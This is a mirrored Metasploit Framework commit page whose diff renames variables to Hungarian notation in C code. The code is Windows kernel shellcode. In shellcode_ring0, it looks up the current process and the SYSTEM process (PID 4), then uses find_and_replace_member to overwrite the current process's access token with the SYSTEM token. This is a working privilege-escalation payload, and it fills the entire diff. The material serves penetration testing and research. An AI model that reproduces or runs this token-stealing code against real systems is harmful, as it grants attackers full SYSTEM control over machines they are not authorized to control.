mirror of https://github.com/rapid7/metasploit-framework synced 2024-10-29 18:07:27 +01:00

Use hungarian notation

jvazquez-r7 2014-10-31 12:47:50 -05:00
parent 8e547e27b3
commit 0c23733722


@ -146,28 +146,28 @@ DWORD_PTR __stdcall get_threadinfo_ptr(void)
// Search the specified data structure for a member with CurrentValue.
BOOL find_and_replace_member(PMYWORD Structure,
MYWORD CurrentValue,
MYWORD NewValue,
MYWORD MaxSize)
BOOL find_and_replace_member(PMYWORD pdwStructure,
MYWORD dwCurrentValue,
MYWORD dwNewValue,
MYWORD dwMaxSize)
{
MYWORD i, Mask;
MYWORD dwIndex, dwMask;
// Microsoft QWORD aligns object pointers, then uses the lower three
// bits for quick reference counting.
#ifdef _M_X64
Mask = ~0xf;
dwMask = ~0xf;
#else
Mask = ~7;
dwMask = ~7;
#endif
// Mask out the reference count.
CurrentValue &= Mask;
dwCurrentValue &= dwMask;
// Scan the structure for any occurrence of CurrentValue.
for (i = 0; i < MaxSize; i++) {
if ((Structure[i] & Mask) == CurrentValue) {
for (dwIndex = 0; dwIndex < dwMaxSize; dwIndex++) {
if ((pdwStructure[dwIndex] & dwMask) == dwCurrentValue) {
// And finally, replace it with NewValue.
Structure[i] = NewValue;
pdwStructure[dwIndex] = dwNewValue;
return TRUE;
}
}
@ -180,19 +180,19 @@ int _stdcall shellcode_ring0(int one, int two, int three, int four)
{
void *pMyProcessInfo = NULL;
void *pSystemInfo = NULL;
PACCESS_TOKEN SystemToken;
PACCESS_TOKEN TargetToken;
PACCESS_TOKEN systemToken;
PACCESS_TOKEN targetToken;
pPsLookupProcessByProcessId((HANDLE)dwMyProcessId, &pMyProcessInfo);
pPsLookupProcessByProcessId((HANDLE)4, &pSystemInfo);
TargetToken = pPsReferencePrimaryToken(pMyProcessInfo);
SystemToken = pPsReferencePrimaryToken(pSystemInfo);
targetToken = pPsReferencePrimaryToken(pMyProcessInfo);
systemToken = pPsReferencePrimaryToken(pSystemInfo);
// Find the token in the target process, and replace with the system token.
find_and_replace_member((PMYWORD)pMyProcessInfo,
(MYWORD)TargetToken,
(MYWORD)SystemToken,
(MYWORD)targetToken,
(MYWORD)systemToken,
0x200);
return 0;
}